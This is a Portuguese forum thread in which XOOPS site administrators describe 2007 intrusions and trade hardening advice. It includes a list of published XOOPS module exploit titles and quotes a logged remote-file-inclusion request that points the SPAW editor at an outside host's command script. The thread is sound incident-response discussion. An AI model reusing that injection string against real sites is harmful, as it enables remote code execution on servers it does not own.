Ataques a portais com XOOPS

  • Identifique-se para criar novos tópicos neste fórum
  • Visitantes anônimos não podem postar neste fórum
andeon  Regular   Postagens: 62

Fique esperto!

Desde 25 de maio até hoje (pelo menos aconteceu comigo) começou inúmeras tentativas de ataques a portais que usam XOOPS.

Tive 2 portais afetados com diferentes versões, módulos e hospedagem um inclusive na locaweb que digamos é chato com segurança. Onde gravaram na pasta uploads, cache, templates_c.

Bem as versões que estava rodando era o XOOPS 2.0.7.3 e outro 2.0.13.2 imediatamente fiz os updates para a versão 2.0.16, que sabemos que tem alguns bugs, mas até agora não enfrentei nenhum.

Recomendo: - Façam o Update para a última versão!

Analisando pelo analog do cpainel achei algumas tentativas de entradas em módulos que podem ser invadidos eles são o XOOPSconteudo, tinycontent graças a uma pasta chamada spaw que é um editor visual que recetemente foi invadido que pode ser usado com os módulos ela fica [nome módulo]/admin/spaw.

Recomendo: - Excluam imediatamente esta pasta do seu portal de todos os módulos que a tem.

Você já pode ter sido afetado então procure no seu portal por arquivos estranhos que não existiam em seu portal nas pastas uploads, cache, templates_c. é facil reconhece-las são estranhos no ninho principalmente se você ainda não cacheia achará rapidamente.

Recomendo: - Exclua as pastas cache e templates_c e criem elas de novo, principalmente se não usam FTP, porque via Web arquivos com .(ponto) algumacoisa ficam ocultos ou dependendo da permissão você ainda não vê.
- Já a uploads faça a varredura geralmente você usa só para imagens, caso exista pastas que não tem haver com módulos que você usa.


Por tudo que indica a invasão não captura senha mas troquem todas elas a do administrador, Mysql, FTP, portal etc.

Recomendo: - Troquem a senhas de todas as areas de administração do portal, se possível por questão de segurança uma diferente para cada area.

As vezes acabamos usando um módulo por anos e não procuramos por atualizações, muitas vezes o módulo é afetado e o desenvolvedor corrige e você ainda não atualiza ou o módulo foi abandonado.

Recomendo: - Procure por atualizações de seus módulos e troque os módulos que foram abandonados por outros existem muitos similares, agora com possibilidades de clonagem de módulos, você pode utilizar o mesmo para vários lugares.

Esta semana também teve invasão por spaw também, já esta mais que na hora de sistema de captcha para registro.

Recomendo: - Buscar informações porque ainda não tem algum hack bem definido, temos que forçar a nave mãe com discurso a adotar algo, porque sistemas de fóruns e outros cms já implementaram isto a algum tempo.

Para proteção extra vale sempre falar adote o protector e precisamos discutir algumas opções a se fazer pelo .htaccess como bloquear criações de certos arquivos que nuncam existiriam em certas pastas com o acesso 755.

Recomendo: - Instalar o Protector Buscar informações sobre segurnça com o a Apache e htaccess.

Estou mantendo um conversa estreita com a Gisa_Iagami aqui e avisando sobre outras tentativas.

Tomem as providencias e comuniquem qualquer fato estranho no portal de vocês.

bacura  Iniciante   Postagens: 1

O cadastro do portal que fiz par uma escola está liberado, sem intervenção do administrador (ativação imediata), a pedido do cliente. Recentemente havia um cadastro de nome estranho e que preencheu todos os comentários do news com span. Apaguei simplesmente, mas me assusta saber que pode-se fazer tudo isto automaticamente. Instalei o Securityimage mas não sei implementá-lo. Gostaria de fazê-lo funcionar no cadastro e no xfguestbook. Valeu.

Ricardo  Membro   Postagens: 172

ótimas recomendações.

Dentre todas destaco com certeza o protector que tem sido essencial.

Mas para quem estiver rodando XOOPS 2.013.2... atualizem porque os problemas vem surgindo mesmo.

E quem tiver algum módulo que usa o SPAW como editor visual, tente buscar um alternativo ou trocar o editor visual, bem como apagar o SPAW do servidor que tem sido uma brecha para invasões, ok?

Luciano  Ocasional De: Curitiba - Paraná - Brasil  Postagens: 32

Amigos!
Depois de muito tempo fora e até mesmo de visitar meu proprio portal, acreditando na segurança, não atualizei com novas versões e fui terrivelmente afetado a ponto do suporte de hospedagem remover a conta devido ao tamanho do estrago.
Vou reiniciar do zero seguindo as dicas aqui postadas.
Snif snif agora não adianta mais, é arregaçar as mangas e fazer funcionar de novo.
Obrigado pelas dicas e vamos em frente.
Pela experiencia dos amigos, favor relacionar os módulos suspeitos para que eu não os instale de novo e também qual versão disponivel já com as últimas seguranças inclusas?
Abraços;
Virtual.
Ganhei.net (Invadido depois de várias outras tentativas anteriores segundo o suporte de hospedagem).

Gislaine  Ocasional   Postagens: 36

Fala o sumidão, rss XOOPS Atendendo ao pedido do nobre colaborador.

-::DATE -::DESCRIPTION -::HITS -::AUTHOR
2007-06-13 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability 2236 R D Sp[L]o1T
2007-06-13 XOOPS Module xt-conteudo (spaw_root) RFI Vulnerability 1763 R D g00ns.
2007-06-13 XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability 2571 R D g00ns.
2007-06-12 XOOPS Module Horoscope <= 2.0 Remote File Inclusion Vulnerability 2273 R D BeyazKurt.
2007-06-01 XOOPS Module icontent 1.0 Remote File Inclusion Exploit 3684 R D GolD_M
2007-05-15 XOOPS Module resmanager <= 1.21 BLIND SQL Injection Exploit 1231 R D ajann.
2007-05-15 XOOPS Module Glossarie <= 1.7 (sid) Remote SQL Injection Exploit 1226 R D ajann.
2007-05-15 XOOPS Module MyConference 1.0 (index.php) SQL Injection Exploit 1831 R D ajann.
2007-05-06 XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability 2203 R D Cyber-Security.
2007-05-04 XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability 1995 R D Cyber-Security.
2007-04-16 XOOPS Module tsdisplay4XOOPS 0.1 Remote File Inclusion Vulnerability 2676 R D GolD_M
2007-04-05 XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit 1764 R D ajann.
2007-04-05 XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit 2194 R D ajann.
2007-04-04 XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit 1532 R D ajann.
2007-04-04 XOOPS Module Rha7 Downloads 1.0 (visit.php) SQL Injection Exploit 1946 R D ajann.
2007-04-03 XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit 1498 R D ajann.
2007-04-02 XOOPS Module WF-Section <= 1.01 (articleid) SQL Injection Exploit 1298 R D ajann.
2007-04-02 XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit 1400 R D ajann.
2007-04-02 XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection Exploit 1793 R D ajann.
2007-04-01 XOOPS Module eCal <= 2.24 (display.php) Remote SQL Injection Exploit 943 R D ajann.
2007-04-01 XOOPS Module Tiny Event <= 1.01 (id) Remote SQL Injection Exploit 785 R D ajann.
2007-04-01 XOOPS Module Kshop <= 1.17 (id) Remote SQL Injection Exploit 1087 R D ajann.
2007-04-01 XOOPS Module Camportail <= 1.1 (camid) Remote SQL Injection Exploit 1085 R D ajann.
2007-04-01 XOOPS Module debaser <= 0.92 (genre.php) BLIND SQL Injection Exploit 1260 R D ajann.
2007-04-01 XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit 1472 R D ajann.
2007-04-01 XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection Exploit 1480 R D ajann.
2007-03-31 XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit 1467 R D ajann.
2007-03-31 XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit 1556 R D ajann.
2007-03-31 XOOPS Module Core (viewcat.php) Remote SQL Injection Exploit 1757 R D ajann.
2007-03-31 XOOPS Module Tutoriais (viewcat.php) Remote SQL Injection Exploit 2357 R D ajann.
2007-03-30 XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit 1641 R D ajann.
2007-03-29 XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit 1712 R D ajann.
2007-03-28 XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit 2098 R D ajann.
2007-03-28 XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit 1770 R D ajann.
2007-03-27 XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit 2312 R D UniquE-Key.
2006-06-28 XOOPS myAds Module (lid) Remote SQL Injection Vulnerability 5169 R D KeyCoder.
2006-05-21 XOOPS <= 2.0.13.2 xoopsOption[nocommon] Remote Exploit 7915 R D rgod.
2005-11-12 XOOPS (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit 6618 R D rgod.
2005-07-04 XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit 9006 R M D RusH

BoOoT  Iniciante De: Moro Na Minha Casa  Postagens: 0

#OOPS# Cacetada!
Dessa lista meu portal tem 1 MOD comprometido.
E la vem a pergunta! O que Fazer.

Remove o Mod ,tem Fix Tem,tem outra versão!

Agora Bateu o desespero !

To vendo se tem uma versão mais nova para esse Mod FUI!

Luciano  Ocasional De: Curitiba - Paraná - Brasil  Postagens: 32

Obrigada Gisa_Iagami amigao.
Viu como a resposta já esta ajudando outros membros.
Sumido é pouco, mas vamos retornando a medida do possivel.
Pela resposta do suporte de hospedagem que nem o bckup é possivel usar, desanimei e vou partir para outra hospedagem e de preferencia com nossos amigos aqui do XOOPS mesmo.
Ja fiz contato e vou aguardar proposta.
Meu último bckup pessoal é de 6 meses para não dizer que perdi tudo...rs..snif..snif.
Vamos a luta e continuo contando com os XoopsAmigos.
Sucesso.
Virtual

Daniel Almeida  Iniciante   Postagens: 0

Poxa pessoal, tive 2 portais invadidos em 20 dias! Por sorte não houveram maiores vandalismos, e consegui recuperar tudo rapidamente.

Os dois portais estavam usando o XOOPS 2.0.13 e ambos tinham o xt-conteúdo com o editor SPAW. O problema é que meus utilizadores já estão muito acostumados com o SPAW! Não posso apagar agora!

Os dois ataques ocorreram de grupos diferentes, um era Brasileiro e outro era da Turquia. Verifiquei as pastas com permissão de escrita (Uploads, Templates_c e Cache) e achei os arquivos 'estranhos'. Provavelmente as falhas de segurança usadas foram divulgadas em algum fórum e agora esses grupos de hackers estão usando contra portais XOOPS.

Isso também teria alguma relação com o problema do PHPMailler?

Na dúvida, vou atualizar para o X2.0.16 e tentar mudar o SPAW. Para os outros colegas com portais em XOOPS, só digo uma coisa: BACKUP neles!

andeon  Regular   Postagens: 62

Lembrando que é melhor fazer algumas trocas de módulos também.

O xt_conteudo > Mastop Publish.
O WF-section > smart section.

Eu sei que o smart section importa o que você já cadastrou no wf-section e também tem clonagem de módulo que é excelente caso use 2 módulos vulneráveis para artigos.

O xt-conteudo foi descontinuado pelo que sei em favor do Publisher e ele tem um editor excelente.

Mesmo depois das atualizações ainda reparei em arquivos entrando pelo cache :

Atributo 600 ou RW
Wrt9sElYN
WrtqEc3os.
WrtYnYkcu.

E mesmo sem a pasta as entradas continuam no cache.

xt_conteudo^%2Fmodules%2Fxt_conteudo%2Findex.php%3Fid%3D1%2F%2Fmodules%2Fxt_conteudo%2Fadmin%2Fspaw%2Fspaw_control.class.php%3Fspaw_root%3Dhttp%3A%2F%2Fgarotym.kit.net%2Fcmd%3F^zaja^%%2A^2AA^2AAE5D37%%db%3Axt_index.html


Eu vou trocar o xt_conteudo pelo Mastop e ver se continua!

Tem como bloquear acessos de portais de miliantes ou fazer alguma denuncia não podemos deixar o negocio correr solto, porque para fazer certas chamadas eles precisam de portais, vi que alguns continuam normalmente com 2 meses sem sair do ar está certos que outros eles queimam.

Rmarx  Iniciante   Postagens: 0

triwaca, Masrtop Publish 1.1 a melhor solução!

Luix  Iniciante   Postagens: 1

olá triwaca,
Como o pessoal já recomendo, o mastop_publish é a saída e também traz o editor wysiswyg TinyMCE que é o pai do editor tinyeditor 1.0, ambos podem ter seu skin alterado.

O caso seria de achar um muito próximo do skin do spaw, isso se você ainda não usava o skin padrão.

é isso

Andrax  Ocasional   Postagens: 27

Fala galera.. tudo bem?

Estou sumidaço... , Mas aos poucos estarei retornando!

Entrando no assunto, alguém sabe me dizer se existe alguma vulnerabilidade ligada ao pical 0.9?

Estava a dar uma olhada no log do servidor e percebi que desde final do mês passado uma série requisições.

66.249.65.230 - - [18/Jul/2007:09:35:38 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Daily&caldate=1982-10-3 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:35:59 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-8-15 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:36:21 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Weekly&caldate=1983-5-28 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:36:42 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-7-27 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:37:03 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-7-8 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:37:25 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-5-6 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:37:47 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-7-30 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:38:08 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1958-5-31 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:38:29 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Daily&caldate=1982-9-22 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:38:51 -0300] "GET /srhonline/modules/piCal/?cid=0&smode=Daily&caldate=1982-12-29 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:39:12 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1958-6-29 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:39:34 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-8-27 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:39:55 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-7-21 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:40:16 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-7-17 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:40:37 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-4-11 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:40:59 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=2032-6-24 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:41:21 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-5-19 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:41:42 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1958-7-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:42:03 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-8-13 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:42:24 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=2032-6-10 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:42:45 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-6-17 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:43:07 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-6-10 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:43:31 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-3-21 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:43:51 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-3-8 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:44:14 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-3-28 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:44:33 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-4-17 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:44:54 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1958-3-16 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:45:15 -0300] "GET /srhonline/modules/piCal/?cid=0&smode=Daily&caldate=2032-4-23 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:45:37 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-2-6 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:45:58 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-10-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:46:20 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Daily&caldate=2032-11-5 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:46:42 -0300] "GET /srhonline/modules/piCal/?cid=0&smode=Daily&caldate=2032-11-24 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:47:02 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-7-22 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:47:23 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1958-2-14 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:47:46 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-12-30 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:48:06 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-7-25 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:48:30 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Daily&caldate=2032-9-2 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:48:49 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-5-29 HTTP/1.1" 200 12510
74.6.73.82 - - [18/Jul/2007:09:49:02 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=2007-6-11 HTTP/1.0" 200 12518
66.249.65.230 - - [18/Jul/2007:09:49:11 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-5-17 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:49:33 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1957-12-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:49:57 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-12-9 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:50:15 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-12-27 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:50:36 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-12-2 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:50:57 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Weekly&caldate=2032-6-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:51:19 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-11-19 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:51:40 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Weekly&caldate=1982-9-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:52:02 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-3-25 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:52:27 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Weekly&caldate=1957-11-3 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:52:46 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-3-16 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:52:56 -0300] "GET /srhonline/modules/piCal/index.php?smode=List&cid=0&num=20&order=summary&op=after&caldate=2006-2-2&pos=20 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:53:06 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-8-1 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:53:28 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Daily&caldate=1982-2-13 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:53:49 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=2032-12-24 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:54:12 -0300] "GET /srhonline/modules/piCal/index.php?cid=&smode=Weekly&caldate=1982-3-7 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:54:33 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-4-30 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:54:55 -0300] "GET /srhonline/modules/piCal/index.php?cid=0&smode=Daily&caldate=1982-2-5 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:55:14 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-11-25 HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:55:36 -0300] "GET /srhonline/modules/piCal/index.php?caldate=2033-4-4& HTTP/1.1" 200 12510
66.249.65.230 - - [18/Jul/2007:09:55:58 -0300] "GET /srhonline/modules/piCal/print.php?cid=&smode=Daily&caldate=1957-10-27 HTTP/1.1" 200 12510


E isso ae é só um pedacinho! .

Pela frequência, parece ser um bot(muito burro pelo jeito) testando alguma vulnerabilidade..., não sei o que ele está tentando fazer!

Como deixei de utilizar o módulo recentemente, providenciei a remoção dele..., mas posso precisar dele muito em breve e gostaria de saber se é algum problema conhecido... e o que posso fazer para saná-lo?

No mais é isso ae galera... agradeço qualquer ajuda!

Abração!
XOOPS

  Pesquisa avançada






Entrada

Codinome:


Senha:





Perdeu a senha?  |Cadastre-se!


Quem nos visita
Há 46 visitantes neste momento... (21 na seção Fóruns)

Associados: 0
Anônimos: 46

outros...

Banner XOOPS Cube